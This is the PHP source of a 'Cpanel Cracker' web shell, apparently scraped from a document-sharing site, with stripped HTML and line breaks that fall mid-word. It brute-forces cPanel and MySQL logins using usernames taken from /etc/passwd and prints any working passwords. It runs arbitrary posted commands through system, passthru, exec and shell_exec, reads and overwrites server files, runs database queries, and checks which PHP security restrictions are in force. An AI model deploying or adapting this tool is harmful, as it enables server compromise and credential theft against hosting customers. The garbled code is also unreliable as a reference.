Professional Documents
Culture Documents
/*
Cpanel Cracker By Hacking Sec-------------> edited by :: H4ntu_Cr3w
*/
@set_time_limit(0);
@error_reporting(0);
echo '
';
function in($type,$name,$size,$value,$checked=0)
{
$ret = "
{
$ret .= "size=".$size." "; }
$ret .= "value=\"".$value."\""; if($checked) $ret .= " checked"; return $ret.">
"; }
class my_sql
{
var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $b
ase = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $c
olumns; var $num_rows; var $num_fields; var $dump; function connect()
{
switch($this->db)
{
case 'MySQL': if(empty($this->port))
{
$this->port = '3306'; }
if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_conn
ect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->
connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break
; case 'MSSQL': if(empty($this->port))
{
$this->port = '1433'; }
if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_conn
ect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection)
return 1; $this->error = "Can't connect to server"; break; case 'PostgreSQL': if
(empty($this->port))
{
$this->port = '5432'; }
$str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' pa
ssword='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_conn
ect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->co
nnection)) return 1; $this->error = @pg_last_error($this->connection); break; ca
se 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @oci
logon($this->user, $this->pass, $this->base); if(is_resource($this->connection))
return 1; $error = @ocierror(); $this->error=$error['message']; break; }
return 0; }
function select_db()
{
switch($this->db)
{
case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; $th
is->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(@mssql_
select_db($this->base,$this->connection)) return 1; $this->error = "Can't select
"; }
break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); ech
o "
affected rows : ".$ar."
"; break; }
}
}
}
}
echo "
Cpanel Cracker by C0die r00t";
echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['d
b_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','
mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']);
echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cccc',0,'db
_query');
echo "
"; echo "Base: base."\">
"; echo "".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nS
ELECT * FROM user;"))."
"; echo ""; echo "
[ BACK ]
"; die(); }
function ccmmdd($ccmmdd2,$att)
{
global $ccmmdd2,$att;
echo '
';
if($_POST['att']==null)
{
echo '
}else{
echo "
system';
$_POST[att]
system
";
}
echo '
passthru
exec
shell_exec
';
if($_POST[att]=='system')
{
echo '
';
system($_POST['ccmmdd2']);
';
echo '
}
if($_POST[att]=='passthru')
{
echo '
';
passthru($_POST['ccmmdd2']);
';
echo '
}
if($_POST[att]=='exec')
{
echo '
';
exec($_POST['ccmmdd2'],$res);
echo $res = join("\n",$res);
';
echo '
}
if($_POST[att]=='shell_exec')
{
echo '
echo
echo '
';
shell_exec($_POST['ccmmdd2']);
';
}
echo '
';
exit;
}
if($_POST['page']=='edit')
{
$code=@str_replace("\r\n","\n",$_POST['code']);
$code=@str_replace('\\','',$code);
$fp = fopen($pathclass, 'w');
fwrite($fp,"$code");
fclose($fp);
echo "
OK Edit
BACK";
exit;
}
if($_POST['page']=='show')
{
$pathclass =$_POST['pathclass'];
echo '
';
$sahacker = fopen($pathclass, "rb");
echo '
'.$pathclass.'
';
$code = fread($sahacker, filesize($pathclass));
echo $code =htmlspecialchars($code);
echo '
';
fclose($sahacker);
echo '
';
exit;
}
if($_POST['page']=='ccmmdd')
{
echo ccmmdd($ccmmdd2,$att);
exit;
}
if($_POST['page']=='find')
{
if(isset($_POST['usernames']) && isset($_POST['passwords']))
{
if($_POST['type'] == 'passwd'){
$e = explode("\n",$_POST['usernames']);
foreach($e as $value){
$k = explode(":",$value);
$username .= $k['0']." ";
}
}elseif($_POST['type'] == 'simple'){
$username = str_replace("\n",' ',$_POST['usernames']);
}
$a1 = explode(" ",$username);
$a2 = explode("\n",$_POST['passwords']);
$id2 = count($a2);
$ok = 0;
foreach($a1 as $user )
{
if($user !== '')
{
$user=trim($user);
for($i=0;$i
{
$pass = trim($a2[$i]);
if(@mysql_connect('localhost',$user,$pass))
{
echo "Hacking Sec~ user is ($user) Password is ($pass)
";
$ok++;
}
}
}
}
echo "
You Found $ok Cpanel (Hacking Sec)";
echo "
BACK";
exit;
}
}
?>
User :
Pass :
Type :
Simple :
/etc/passwd :
CMD MYSQL
user
pass
database
cmd ~
SHOW DATABASES;
SHOW TABLES user_vb ;
SELECT * FROM user;
SELECT version();
SELECT user();
CMD
system - passthru - exec - shell_exec
cmd ~
if($_POST['att']==null)
{
echo '
}else{
echo "
system';
$_POST[att]
system
";
}
?>
passthru
exec
shell_exec
Show
File And Edit
Path ~
Info
Security
Safe Mode
$safe_mode = ini_get('safe_mode');
if($safe_mode=='1')
{
echo 'ON';
}else{
echo 'OFF';
}
?>
Function
if(''==($func=@ini_get('disable_functions')))
{
echo "No Security for Function";
}else{
echo "$func";
}
?>
if ($_GET['user'] )
system('ls /var/mail');
for($uid=0;$uid
}
?>